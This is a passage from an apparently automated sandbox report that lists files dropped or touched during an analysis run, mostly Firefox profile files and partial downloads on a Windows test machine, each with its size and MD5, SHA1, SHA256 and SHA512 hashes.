bb65b42f4ea383137e6aac1e637a87bb937c3cb85414c57264e6b52626a45f08

SHA512
10c96c8251f03ca22ba0e2496b2815b51fbdb0b2d7ca5edfea7f3ff90a534cbf9d1a8a9c1a73ffb3996961f7ed480bc52278e77dae23c80a14a2e998ad901f88

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lirn7gz7.default-release\datareporting\glean\pending_pings\3d667dbc-1527-4f9b-8254-e217d298171a

Filesize
27KB

MD5
8e52139498a24f736a46c70d24c1a892

SHA1
180372656ba1d23cb06d87f6d89d7065475690bc

SHA256
b6a2710bb7bd7478945486a2c53a35282ad8cae2abcd29d588ecec433ff82b2f

SHA512
1e0633c6554ef27aace645e1b4c00ea89aad4699d4cf257b0069e55e4c58338ed785092cc2868f6923827368856be692d25be9811a0118478f1a5cb98384dd0a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lirn7gz7.default-release\datareporting\glean\pending_pings\b5023fe4-b7aa-4ecd-84f4-e5bcdd1d2b7b

Filesize
671B

MD5
36464bf9bd5a3edd8d9036770a3eb273

SHA1
60b93b43a41bb990c0431e30d9d0428620fb8ad3

SHA256
10ea5018c9f177a1a48916a86df4b1a4fe0a3401272a26197a192fac88e78430

SHA512
6153921c76058cd43ae57483158606e40abe061a8d361cb68111a033b18de482d5e47624369b2f71448d133a76ff2cb998733eb05bba5eebfac7daf4a0528193

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lirn7gz7.default-release\prefs-1.js

Filesize
11KB

MD5
a1f07d0a941b0a74c7690f1ffe0bb619

SHA1
27d7c51135bc2f294117f54462ad883ed66d5646

SHA256
fa7019e38b840fd20bc727930f72484de370fc043c53b84724255754251a2dee

SHA512
677f0cba36cef6d5807af3021b9ad51d21a06c5c22a550c7119d5fe1f7c9ed0b9b2c30eab6563c5be4137ab02e0f53cff705cfb73f2346c8bc6c412c36d4ebc2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lirn7gz7.default-release\sessionCheckpoints.json

Filesize
228B

MD5
66bdbb6de2094027600e5df8fbbf28f4

SHA1
ce033f719ebce89ac8e5c6f0c9fed58c52eca985

SHA256
df49028535e3efe4ed524570624866cca8152de6b0069ebb25580fce27dccebc

SHA512
18782069ef647653df0b91cb13ba13174a09ce2a201e8f4adfb7b145baf6c3a9246ef74bdad0774a3023ec5b8b67aba320641e11dd4b8a195e1c2b448202a660

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lirn7gz7.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
376KB

MD5
68854ea5cee03148626a8a006fbb5a56

SHA1
77a208f16976b8e46fe2b52b2fd0534e1390dc1e

SHA256
3dac566a39fb52a0f333cfaa19b47be69d09b3930ec1c30ddbe5b3979a0993e0

SHA512
1bb3ddd303481992161e595e10c11043e447a2d8b04c25ec35ee8cda3cef87045285185f0c16a3898151c788cedf42764e3770f473f366bb6424f8264fd3c239

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 291870.crdownload

Filesize
856B

MD5
9b52f6b0533f05686ed29b63a12a88b3

SHA1
25cf52a9a62253bc6566946dfac5d119e70b24f3

SHA256
7dc767c9996b5bcf4ecfec32ae92a66ee7eb92d85ca8fa294872a5890adf467f

SHA512
dcf6e90c06ce2bf65141ec1e0979fae9b2f8bfe8f6d0ee88028f691045d6ca59f0fba51df78c92453abd0f5208ef925752b920f80751bfca2726f71f9ae7e97b

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 424052.crdownload

Filesize
31KB

MD5
29a37b6532a7acefa7580b826f23f6dd

SHA1
a0f4f3a1c5e159b6e2dadaa6615c5e4eb762479f

SHA256
7a84dd83f4f00cf0723b76a6a56587bdce6d57bd8024cc9c55565a442806cf69

SHA512
a54e2b097ffdaa51d49339bd7d15d6e8770b02603e3c864a13e5945322e28eb2eebc32680c6ddddbad1d9a3001aa02e944b6cef86d4a260db7e4b50f67ac9818

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 966899.crdownload

Filesize
89KB

MD5
86d68c9cdc087c76e48a453978b63b7c

SHA1
b8a684a8f125ceb86739ff6438d283dbafda714a

SHA256
df51babc1547a461656eaef01b873a91afcf61851b6f5ef06977e1c33e1b5f32

SHA512
dd627f071d994999172048f882ba61407461633634fdb2a3f2b8e6abff6324cc0d78682b5adc4aa4083e5baa1c981687f5c516d9e075eb00dfb58364cee1db04

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 966899.crdownload:SmartScreen

Filesize
7B

MD5
4047530ecbc0170039e76fe1657bdb01

SHA1
32db7d5e662ebccdd1d71de285f907e3a1c68ac5

SHA256
82254025d1b98d60044d3aeb7c56eed7c61c07c3e30534d6e05dab9d6c326750

SHA512
8f002af3f4ed2b3dfb4ed8273318d160152da50ee4842c9f5d9915f50a3e643952494699c4258e6af993dc6e1695d0dc3db6d23f4d93c26b0bc6a20f4b4f336e

Download Submit
memory/3976-1869-0x0000028332430000-0x0000028332452000-memory.dmp

Filesize
136KB

Download